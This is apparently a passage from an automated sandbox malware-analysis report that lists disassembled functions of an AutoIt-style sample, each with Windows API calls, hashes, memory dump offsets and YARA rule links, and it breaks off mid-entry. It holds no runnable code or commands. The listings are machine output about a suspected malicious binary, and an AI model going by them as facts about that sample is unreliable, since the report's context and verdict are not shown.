                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                            Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • CloseHandle.KERNEL32(?), ref: 00457E09
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                            • String ID: <$@
                            • API String ID: 2417854910-1426351568
                            • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                            • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                            Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3705125965-3916222277
                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                            Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem
                            • String ID: 0
                            • API String ID: 135850232-4108050209
                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                            Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                            Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Library$AddressFreeLoadProc
                            • String ID: AU3_GetPluginDetails
                            • API String ID: 145871493-4132174516
                            • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                            • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                            Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                            Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 3375834691-2298589950
                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                            Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: $<
                            • API String ID: 4104443479-428540627
                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                            Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                            Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                            Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                            Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                            Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                            Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                            Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                            • String ID: crts
                            • API String ID: 943502515-3724388283
                            • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                            • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                            Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Memory Dump Source
